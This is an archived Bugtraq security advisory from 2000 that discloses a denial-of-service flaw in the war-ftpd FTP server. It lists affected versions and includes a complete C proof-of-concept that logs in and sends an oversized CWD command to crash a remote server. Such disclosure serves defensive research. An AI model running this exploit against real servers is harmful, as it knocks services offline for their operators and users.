Home page logo
/

bugtraq logo Bugtraq mailing list archives

war-ftpd 1.6x DoS
From: crc () SIRIUS IMASY OR JP (Toshimi Makino)
Date: Tue, 1 Feb 2000 16:58:46 +0900


Hello,

"war-ftpd" is very popular ftp server for Windows95/98/NT.
I found DoS problem to "war-ftpd 1.6x" recently.

Outline:
  It seems to occur because the bound check of the command of MKD/CWD
  that uses it is imperfect when this problem controls the directory.

  However, could not hijack the control of EIP so as long as I test.
  It is because not able to overwrite the RET address,
  because it seems to be checking buffer total capacity properly
  in 1.66x4 and later.

  The boundary of Access Violation breaks out among 8182 bytes
  from 533 bytes neighborhood although it differs by the thread
  that receives attack.

The version that is confirming this vulnerable point is as follows.
  1.66x4s, 1.67-3

The version that this vulnerable point was not found is as follows.
  1.71-0

Test Environments:
  Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2
  Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2
  Microsoft WindowsNT 4.0 Server SP4 Japanese version

Solution:
  1.70-1 should be used to solve this problem fundamentally.
  Because it becomes "Access denied" in 1.71-0 DoS did not break out.


---
warftpd-dos.c

I coded program for the reappearance of this problem.
The contents apply DoS attack for "war-ftpd" to the server
who is working from the remote.

/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/

#include    <stdio.h>
#include    <string.h>
#include    <winsock.h>
#include    <windows.h>

#define     FTP_PORT        21
#define     MAXBUF          8182
//#define     MAXBUF          553
#define     MAXPACKETBUF    32000
#define     NOP             0x90

void main(int argc,char *argv[])
{
    SOCKET               sock;
    unsigned long        victimaddr;
    SOCKADDR_IN          victimsockaddr;
    WORD                 wVersionRequested;
    int                  nErrorStatus;
    static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
    hostent              *victimhostent;
    WSADATA              wsa;

    if (argc < 3){
        printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    nErrorStatus = WSAStartup(wVersionRequested, &wsa);
    if (atexit((void (*)(void))(WSACleanup))) {
        fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
    }

    if ( nErrorStatus != 0 ) {
        fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
    }

    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        fprintf(stderr,"Can't create socket.\n"); exit(-1);
    }

    victimaddr = inet_addr((char*)argv[1]);
    if (victimaddr == -1) {
        victimhostent = gethostbyname(argv[1]);
        if (victimhostent == NULL) {
            fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
        }
        else
            victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
    }

    victimsockaddr.sin_family        = AF_INET;
    victimsockaddr.sin_addr.s_addr  = victimaddr;
    victimsockaddr.sin_port  = htons((unsigned short)FTP_PORT);
    memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));

    if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
        fprintf(stderr,"Connection refused.\n"); exit(-1);
    }

    printf("Attacking war-ftpd ...\n");
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
    sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
    sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);

    memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;

    sprintf((char *)packetbuf,"CWD %s\r\n",buf);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);

    Sleep(100);
    shutdown(sock, 2);
    closesocket(sock);
    WSACleanup();
    printf("done.\n");
}

----
       Toshimi Makino   E-mail:crc () sirius imasy or jp



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault